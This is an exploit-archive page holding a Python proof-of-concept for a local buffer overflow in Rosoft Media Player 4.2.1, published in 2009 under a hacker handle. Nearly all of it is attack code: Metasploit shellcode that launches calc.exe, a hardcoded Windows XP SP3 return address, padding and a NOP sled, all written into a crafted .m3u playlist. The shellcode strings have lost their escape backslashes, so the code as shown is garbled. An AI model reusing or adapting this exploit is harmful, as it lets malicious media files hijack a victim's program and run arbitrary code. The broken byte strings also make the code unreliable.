Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit
# Published : 2009-01-06
# Author : Encrypt3d.M!nd
# Previous Title : Debian GNU/Linux XTERM (DECRQSS/comments) Weakness Vulnerability
# Next Title : VUPlayer 2.49 (.wax File) Local Buffer Overflow Exploit

# Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit(0-day)
# By:Encrypt3d.M!nd
#
# Well,There is a buffer overflow in the program were all the supported types are
# Affected(m3u,rml,txt),Also Rosoft Media Player treat all the other types as txt so all
# the types are affected :),and also all the versions are affected
#
# Greetz:-=Mizo=-,L!ON,El Mariachi,MiNi SpIder,and all my friends
# I'm Iraqian...Not Arabian



# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com 
shellcode = (
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa9"
"x21xdbx5bx83xebxfcxe2xf4x55xc9x9fx5bxa9x21x50x1e"
"x95xaaxa7x5exd1x20x34xd0xe6x39x50x04x89x20x30x12"
"x22x15x50x5ax47x10x1bxc2x05xa5x1bx2fxaexe0x11x56"
"xa8xe3x30xafx92x75xffx5fxdcxc4x50x04x8dx20x30x3d"
"x22x2dx90xd0xf6x3dxdaxb0x22x3dx50x5ax42xa8x87x7f"
"xadxe2xeax9bxcdxaax9bx6bx2cxe1xa3x57x22x61xd7xd0"
"xd9x3dx76xd0xc1x29x30x52x22xa1x6bx5bxa9x21x50x33"
"x95x7exeaxadxc9x77x52xa3x2axe1xa0x0bxc1xd1x51x5f"
"xf6x49x43xa5x23x2fx8cxa4x4ex42xbax37xcax0fxbex23"
"xccx21xdbx5b")

File = 'encrypt3d.m3u' # change it with what ever you like

eip = "x6Bx8Cx49x7E" # Windows XP SP3:user32.dll

chars = "A"*4096

addr = "xF0xFFxFDx7F" # Writeable address contains 0,NOT 0x00

#addr = "xE0x0Fx70x12" # if the address above not workin try this one

file=open(File,'w')
file.write(chars+addr+"x90"*4+eip+"x90"*10+shellcode)
file.close()

# www.Syue.com [2009-01-06]